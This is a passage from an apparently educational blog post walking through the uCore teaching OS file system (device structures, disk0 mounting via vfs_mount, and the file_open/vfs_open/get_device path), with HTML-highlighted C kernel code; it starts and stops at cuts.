class="line">&#125;;</span><br></pre></td></tr></table></figure><p>This structure can represent both block devices and character devices, and it provides the basic operations on a device.</p><p>Different underlying devices plug in different functions. The two functions below, for example, initialize the <code>device</code> structure for two different devices:</p><blockquote><p>Note that the familiar <code>stdin</code> and <code>stdout</code> are input/output devices in uCore and sit at the same level as <code>disk0</code>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stdin_device_init</span><span class="params">(<span class="keyword">struct</span> device *dev)</span> </span>&#123;</span><br><span class="line">    dev-&gt;d_blocks = <span class="number">0</span>;</span><br><span class="line">    dev-&gt;d_blocksize = <span class="number">1</span>;</span><br><span class="line">    dev-&gt;d_open = stdin_open;</span><br><span class="line">    dev-&gt;d_close = stdin_close;</span><br><span class="line">  
  dev-&gt;d_io = stdin_io;</span><br><span class="line">    dev-&gt;d_ioctl = stdin_ioctl;</span><br><span class="line"></span><br><span class="line">    p_rpos = p_wpos = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">wait_queue_init</span>(wait_queue);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">disk0_device_init</span><span class="params">(<span class="keyword">struct</span> device *dev)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">static_assert</span>(DISK0_BLKSIZE % SECTSIZE == <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">ide_device_valid</span>(DISK0_DEV_NO)) &#123;</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;disk0 device isn&#x27;t available.\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    dev-&gt;d_blocks = <span class="built_in">ide_device_size</span>(DISK0_DEV_NO) / DISK0_BLK_NSECT;</span><br><span class="line">    dev-&gt;d_blocksize = DISK0_BLKSIZE;</span><br><span class="line">    dev-&gt;d_open = disk0_open;</span><br><span class="line">    dev-&gt;d_close = disk0_close;</span><br><span class="line">    dev-&gt;d_io = disk0_io;</span><br><span class="line">    dev-&gt;d_ioctl = disk0_ioctl;</span><br><span class="line">    <span class="built_in">sem_init</span>(&amp;(disk0_sem), <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">static_assert</span>(DISK0_BUFSIZE % DISK0_BLKSIZE == <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> ((disk0_buffer = <span class="built_in">kmalloc</span>(DISK0_BUFSIZE)) == <span 
class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;disk0 alloc buffer failed.\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The <code>device</code> structure only describes what a device can do; a separate data structure is needed to associate a <code>device</code> with an <code>fs</code>. In addition, uCore keeps all registered devices on one linked list so that every device can be reached through it. This is what the <code>vfs_dev_t</code> structure is for.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// device info entry in vdev_list</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *devname;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *devnode;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">fs</span> *fs;</span><br><span class="line">    <span class="type">bool</span> mountable;</span><br><span class="line">    <span class="type">list_entry_t</span> vdev_link;</span><br><span class="line">&#125; <span class="type">vfs_dev_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> le2vdev(le, member)                         \</span></span><br><span class="line"><span class="meta">  
to_struct((le), vfs_dev_t, member)</span></span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">list_entry_t</span> vdev_list;     <span class="comment">// device info list in vfs layer</span></span><br><span class="line"><span class="type">static</span> <span class="type">semaphore_t</span> vdev_list_sem;</span><br></pre></td></tr></table></figure></li><li><p><code>stdin</code> and <code>stdout</code> are treated as standard input/output <strong>devices</strong> in uCore and, like <code>disk0</code>, are managed by the VFS.</p><p>The uCore kernel does not <strong>open</strong> <code>stdin</code> and <code>stdout</code> for each process on its own, yet user programs can still use statements such as <code>write(1, buf, size)</code>. This works because <code>umain</code> is linked into every user executable, and it sets up the file descriptors for <code>stdin</code> and <code>stdout</code> before calling the program's <code>main</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">umain</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> fd;</span><br><span class="line">    <span class="keyword">if</span> ((fd = <span class="built_in">initfd</span>(<span class="number">0</span>, <span class="string">&quot;stdin:&quot;</span>, O_RDONLY)) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">warn</span>(<span class="string">&quot;open &lt;stdin&gt; failed: %e.\n&quot;</span>, 
fd);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ((fd = <span class="built_in">initfd</span>(<span class="number">1</span>, <span class="string">&quot;stdout:&quot;</span>, O_WRONLY)) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">warn</span>(<span class="string">&quot;open &lt;stdout&gt; failed: %e.\n&quot;</span>, fd);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">int</span> ret = <span class="built_in">main</span>(argc, argv);</span><br><span class="line">    <span class="built_in">exit</span>(ret);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>One more layer down is the disk driver, which talks directly to the disk's I/O interface. For example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">ide_read_secs</span><span class="params">(<span class="type">unsigned</span> <span 
class="type">short</span> ideno, <span class="type">uint32_t</span> secno, <span class="type">void</span> *dst, <span class="type">size_t</span> nsecs)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(nsecs &lt;= MAX_NSECS &amp;&amp; <span class="built_in">VALID_IDE</span>(ideno));</span><br><span class="line">    <span class="built_in">assert</span>(secno &lt; MAX_DISK_NSECS &amp;&amp; secno + nsecs &lt;= MAX_DISK_NSECS);</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">short</span> iobase = <span class="built_in">IO_BASE</span>(ideno), ioctrl = <span class="built_in">IO_CTRL</span>(ideno);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">ide_wait_ready</span>(iobase, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// generate interrupt</span></span><br><span class="line">    <span class="built_in">outb</span>(ioctrl + ISA_CTRL, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_SECCNT, nsecs);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_SECTOR, secno &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_CYL_LO, (secno &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_CYL_HI, (secno &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(iobase + ISA_SDH, <span class="number">0xE0</span> | ((ideno &amp; <span class="number">1</span>) &lt;&lt; <span class="number">4</span>) | ((secno &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xF</span>));</span><br><span class="line">    <span 
class="built_in">outb</span>(iobase + ISA_COMMAND, IDE_CMD_READ);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (; nsecs &gt; <span class="number">0</span>; nsecs --, dst += SECTSIZE) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">ide_wait_ready</span>(iobase, <span class="number">1</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">insl</span>(iobase, dst, SECTSIZE / <span class="built_in">sizeof</span>(<span class="type">uint32_t</span>));</span><br><span class="line">    &#125;</span><br><span class="line">out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-文件系统挂载流程">c. 
File system mount flow</h4><p>Before a file system can be used, it must be mounted into the kernel. In uCore, the disk <code>disk0</code> is mounted as follows:</p><ul><li><p>First, <code>fs_init</code> calls <code>init_device(disk0)</code>, which initializes the corresponding <code>device</code> structure and links it into the <code>vdev_list</code> list.</p></li><li><p>Next, <code>fs_init</code> calls <code>sfs_init() -&gt; sfs_mount(&quot;disk0&quot;)</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_mount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">vfs_mount</span>(devname, sfs_do_mount);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>sfs_mount</code> then calls <code>vfs_mount</code>, and the <code>vfs</code> mount interface in turn invokes the mount function that <code>sfs</code> provides, <code>sfs_do_mount</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span 
class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * vfs_mount - Mount a filesystem. Once we&#x27;ve found the device, call MOUNTFUNC to</span></span><br><span class="line"><span class="comment"> *             set up the filesystem and hand back a struct fs.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The DATA argument is passed through unchanged to MOUNTFUNC.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">vfs_mount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="type">int</span> (*mountfunc)(<span class="keyword">struct</span> device *dev, <span class="keyword">struct</span> fs **fs_store))</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="built_in">lock_vdev_list</span>();</span><br><span class="line">    <span class="comment">// find the device to be mounted in the device list</span></span><br><span class="line">    <span class="type">vfs_dev_t</span> *vdev;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">find_mount</span>(devname, &amp;vdev)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> out;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (vdev-&gt;fs != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        ret = -E_BUSY;</span><br><span class="line">        <span class="keyword">goto</span> 
out;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">assert</span>(vdev-&gt;devname != <span class="literal">NULL</span> &amp;&amp; vdev-&gt;mountable);</span><br><span class="line">    <span class="comment">// run the mount routine of the specific file system</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">device</span> *dev = <span class="built_in">vop_info</span>(vdev-&gt;devnode, device);</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">mountfunc</span>(dev, &amp;(vdev-&gt;fs))) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">assert</span>(vdev-&gt;fs != <span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;vfs: mount %s.\n&quot;</span>, vdev-&gt;devname);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">out:</span><br><span class="line">    <span class="built_in">unlock_vdev_list</span>();</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The <code>sfs_do_mount</code> mount function performs the following steps:</p><ul><li>Read the superblock from the device being mounted, and verify its magic number and total block count.</li><li>Initialize the hash list.</li><li>Read the <code>freemap</code> from the device being mounted and check that it is correct.</li><li>Fill in the <code>fs</code> structure, and at the end of the function store it through the <code>fs_store</code> pointer, i.e. into the <code>fs</code> member of the <code>vdev</code> entry that <code>vfs_mount</code> passed in as <code>&amp;(vdev-&gt;fs)</code>.</li></ul></li></ul><h4 id="d-文件打开流程">d. 
File open flow</h4><ul><li><p>When a user process calls <code>open</code>, the system call traps into the kernel function <code>sysfile_open</code>, which in turn calls <code>file_open</code>. <code>file_open</code> mainly does the following:</p><ul><li>Obtain a free <code>file</code> object from the file management structure <code>filesp</code> of the current process.</li><li>Call <code>vfs_open</code> and store the <code>inode</code> it returns.</li><li>Set the attributes of the <code>file</code> object based on that <code>inode</code>. If the file is opened in <code>append</code> mode, also set the <code>pos</code> member of <code>file</code> to the current file size.</li><li>Finally, return <code>file-&gt;fd</code>.</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// open 
file</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">file_open</span><span class="params">(<span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> readable = <span class="number">0</span>, writable = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">switch</span> (open_flags &amp; O_ACCMODE) &#123;</span><br><span class="line">    <span class="keyword">case</span> O_RDONLY: readable = <span class="number">1</span>; <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> O_WRONLY: writable = <span class="number">1</span>; <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> O_RDWR:</span><br><span class="line">        readable = writable = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">file</span> *file;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">fd_array_alloc</span>(NO_FD, &amp;file)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">    
<span class="keyword">if</span> ((ret = <span class="built_in">vfs_open</span>(path, open_flags, &amp;node)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fd_array_free</span>(file);</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    file-&gt;pos = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (open_flags &amp; O_APPEND) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">stat</span> __stat, *stat = &amp;__stat;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">vop_fstat</span>(node, stat)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">vfs_close</span>(node);</span><br><span class="line">            <span class="built_in">fd_array_free</span>(file);</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">        &#125;</span><br><span class="line">        file-&gt;pos = stat-&gt;st_size;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    file-&gt;node = node;</span><br><span class="line">    file-&gt;readable = readable;</span><br><span class="line">    file-&gt;writable = writable;</span><br><span class="line">    <span class="built_in">fd_array_open</span>(file);</span><br><span class="line">    <span class="keyword">return</span> file-&gt;fd;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>vfs_open</code> mainly does the following:</p><ul><li><p>Call <code>vfs_lookup</code> to search the given path and determine whether the file exists. If it does, <code>vfs_lookup</code> returns the corresponding <code>inode</code> into the local variable <code>node</code> of <code>vfs_open</code>.</p></li><li><p>If the given path does not exist, i.e. the file does not exist, then depending on the flags passed in, either call <code>vop_create</code> to create a new file or return the error directly.</p><blockquote><p>The <code>SFS</code> file-creation function behind <code>vop_create</code> does not appear to be implemented?</p></blockquote></li><li><p>At this point the local variable <code>node</code> is guaranteed to be non-NULL, and <code>vop_open</code> is called to open the file.</p><blockquote><p>In SFS, <code>sfs_openfile</code>, the function behind <code>vop_open</code>, does nothing, but the interface still has to be kept.</p></blockquote></li><li><p>If the file opens successfully, the <code>open_flags</code> argument determines whether the file must be truncated to length 0 (i.e. <strong>emptied</strong>); the code does so when <code>O_TRUNC</code> or <code>O_CREAT</code> is set. If truncation is needed, <code>vop_truncate</code> is called. The function then returns.</p></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span 
class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// open file in vfs, get/create inode for file with filename path.</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">vfs_open</span><span class="params">(<span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags, <span class="keyword">struct</span> inode **node_store)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> can_write = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">switch</span> (open_flags &amp; O_ACCMODE) &#123;</span><br><span class="line">    <span class="keyword">case</span> O_RDONLY:</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> O_WRONLY:</span><br><span class="line">    <span class="keyword">case</span> O_RDWR:</span><br><span class="line">        can_write = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span 
class="keyword">return</span> -E_INVAL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (open_flags &amp; O_TRUNC) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!can_write) &#123;</span><br><span class="line">            <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">    <span class="type">bool</span> excl = (open_flags &amp; O_EXCL) != <span class="number">0</span>;</span><br><span class="line">    <span class="type">bool</span> create = (open_flags &amp; O_CREAT) != <span class="number">0</span>;</span><br><span class="line">    ret = <span class="built_in">vfs_lookup</span>(path, &amp;node);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (ret != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (ret == <span class="number">-16</span> &amp;&amp; (create)) &#123;</span><br><span class="line">            <span class="type">char</span> *name;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">inode</span> *dir;</span><br><span class="line">            <span class="keyword">if</span> ((ret = <span class="built_in">vfs_lookup_parent</span>(path, &amp;dir, &amp;name)) != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="keyword">return</span> ret;</span><br><span class="line">            &#125;</span><br><span class="line">            ret = <span class="built_in">vop_create</span>(dir, name, excl, &amp;node);</span><br><span 
class="line">        &#125; <span class="keyword">else</span> <span class="keyword">return</span> ret;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (excl &amp;&amp; create) &#123;</span><br><span class="line">        <span class="keyword">return</span> -E_EXISTS;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">assert</span>(node != <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">vop_open</span>(node, open_flags)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">vop_ref_dec</span>(node);</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">vop_open_inc</span>(node);</span><br><span class="line">    <span class="keyword">if</span> (open_flags &amp; O_TRUNC || create) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">vop_truncate</span>(node, <span class="number">0</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">vop_open_dec</span>(node);</span><br><span class="line">            <span class="built_in">vop_ref_dec</span>(node);</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    *node_store = node;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>That is essentially the whole open operation, but it is worth looking at how path lookup and file truncation work.</p><ul><li><p><code>vfs_lookup</code> looks up the given path and returns the corresponding <code>inode</code>.</p><ul><li><p>It first calls <code>get_device</code> to obtain the <code>inode</code> from which the lookup starts. <code>get_device</code> parses the <code>path</code> string and handles the following three cases:</p><ul><li><p><code>directory/filename</code>: a relative path. <code>vfs_get_curdir</code> is called to obtain the working directory of the current process, and its <code>inode</code> is returned.</p></li><li><p><code>/directory/filename</code> or <code>:directory/filename</code>: an absolute path with no device specified.</p><ul><li><p>For <code>/directory/filename</code>, the <code>inode</code> of the root directory of <code>bootfs</code> is returned.</p><blockquote><p><code>bootfs</code> is the file system of the kernel boot disk.</p></blockquote></li><li><p>For <code>:directory/filename</code> (any slashes right after the colon are skipped), the root directory of the file system that contains the working directory of the current process is looked up, and its <code>inode</code> is returned.</p></li></ul></li><li><p><code>device:directory/filename</code> or <code>device:/directory/filename</code>: an absolute path with a device specified. The <code>inode</code> of the root directory of that device is returned.</p></li></ul><blockquote><p>In short, <code>get_device</code> always returns a directory <code>inode</code>.</p></blockquote><p>The code of <code>get_device</code> is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span 
class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * get_device- Common code to pull the device name, if any, off the front of a</span></span><br><span class="line"><span class="comment"> *             path and choose the inode to begin the name lookup relative to.</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">get_device</span><span class="params">(<span class="type">char</span> *path, <span class="type">char</span> **subpath, <span class="keyword">struct</span> inode **node_store)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> i, slash = <span class="number">-1</span>, colon = <span 
class="number">-1</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; path[i] != <span class="string">&#x27;\0&#x27;</span>; i ++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (path[i] == <span class="string">&#x27;:&#x27;</span>) &#123; colon = i; <span class="keyword">break</span>; &#125;</span><br><span class="line">        <span class="keyword">if</span> (path[i] == <span class="string">&#x27;/&#x27;</span>) &#123; slash = i; <span class="keyword">break</span>; &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (colon &lt; <span class="number">0</span> &amp;&amp; slash != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">/* *</span></span><br><span class="line"><span class="comment">         * No colon before a slash, so no device name specified, and the slash isn&#x27;t leading</span></span><br><span class="line"><span class="comment">         * or is also absent, so this is a relative path or just a bare filename. 
